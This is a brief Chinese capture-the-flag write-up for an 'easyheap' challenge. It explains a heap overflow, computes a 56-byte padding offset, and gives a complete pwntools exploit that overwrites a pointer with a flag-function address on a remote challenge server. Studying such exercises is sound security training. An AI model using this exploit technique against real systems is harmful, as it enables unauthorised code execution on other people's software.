easyheap:
本题是简单的堆溢出,我们先将文件运行一下,看下程序想要执行的具体功能是什么。
可以看到该程序是一个常见的菜单程序,将程序放入IDA进行反编译。
根据malloc函数和qword_602098+8可以计算出填充字符大小为0x20+0x10+8=56
知道这些之后就可以直接写脚本了
```
from pwn import *
target = remote('202.112.51.217',24598)
#target = process("./easyheap.easyheap")这是本地的
flag = 0x400766
payload = 'A' *56 + p64(flag)
target.recvuntil('name?\n')
target.sendline('1')
target.recvuntil('choice :')
target.sendline('1')
target.recvuntil('Name:\n')
target.sendline('1')
target.recvuntil('choice :')
target.sendline('3')
target.recvuntil('info:\n')
target.sendline(payload)
target.recvuntil('choice :')
target.sendline('2')
target.interactive()
```